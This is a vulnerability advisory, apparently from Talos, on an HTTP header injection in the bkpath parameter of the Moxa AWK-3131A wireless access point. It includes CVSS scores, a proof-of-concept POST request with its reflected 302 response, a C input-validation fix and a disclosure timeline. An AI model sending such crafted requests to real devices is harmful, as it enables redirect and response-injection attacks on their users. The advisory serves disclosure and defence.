Talos Intelligence TALOS-2016-0234
Apr 10, 2017 - 12:00 a.m.

Moxa AWK-3131A Web Application bkpath HTTP Header Injection Vulnerability

2017-04-10 00:00:00
Talos Intelligence
www.talosintelligence.com

CVSS2: 4.3 Medium

Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3: 4.3 Medium

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: LOW
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

EPSS: 0.003 Low
Percentile: 65.8%

Summary

An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter, which is copied into the Location header of the HTTP response.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

<http://www.moxa.com/product/AWK-3131A.htm>

CVSSv3 Score

3.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Details

An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted HTTP request can inject a payload in the bkpath parameter, which is copied into the Location header of the HTTP response. This vulnerability can be exploited in order to execute a variety of other attacks.

Exploit Proof-of-Concept

Request

POST /forms/iw_webSetParameters HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http:///time_set.asp
Cookie: Password508=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 486

iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun.&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE

Response

HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Mon Oct 31 17:33:45 2016
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Type: text/html
Location: http:///EVIL_INJECTION

<html><head></head><body>
        This document has moved to a new <a href="http://<device IP>/EVIL_INJECTION">location</a>.
        Please update your documents to reflect the new location.
        </body></html>

Mitigation

To significantly mitigate risk of exploitation, disable the web application before the device is deployed.
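
Where the web application has to stay enabled, the server-side counterpart to this mitigation is to validate bkpath before it is copied into the Location header and the redirect body. The following is an added example, not code from Moxa, GoAhead or the Talos advisory; the function names, the ".asp"-only policy, the length limit and the fallback page name are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BKPATH_MAX 64                 /* assumed length limit */
#define FALLBACK_PAGE "FALLBACK.asp"  /* placeholder, not a real device page */

/* True only if bkpath is a plain relative page name such as "time_set.asp".
 * Assumed policy: device pages end in ".asp" and use [A-Za-z0-9_-./] only. */
bool bkpath_is_safe(const char *bkpath)
{
    if (bkpath == NULL)
        return false;
    size_t len = strlen(bkpath);
    if (len < 5 || len > BKPATH_MAX || strcmp(bkpath + len - 4, ".asp") != 0)
        return false;
    if (bkpath[0] == '/' || bkpath[0] == '.')
        return false;                 /* no "//host", no leading "../" */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)bkpath[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '_' || c == '-' ||
                  c == '.' || c == '/';
        if (!ok)
            return false;             /* CR, LF, space, ':', '%', '"', '<', '>' */
        if ((c == '.' || c == '/') && bkpath[i + 1] == c)
            return false;             /* no ".." traversal, no "//" */
    }
    return true;
}

/* Writes the Location header line into out. host must come from device
 * configuration, not from the request. Returns 0, or -1 if out is too small. */
int build_location(char *out, size_t outlen, const char *host, const char *bkpath)
{
    const char *target = bkpath_is_safe(bkpath) ? bkpath : FALLBACK_PAGE;
    int n = snprintf(out, outlen, "Location: http://%s/%s\r\n", host, target);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}
```

The same check applies to the href in the "document has moved" body, since the response above reflects bkpath there as well.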

Timeline

2016-11-14 - Vendor Disclosure
2017-04-10 - Public Release
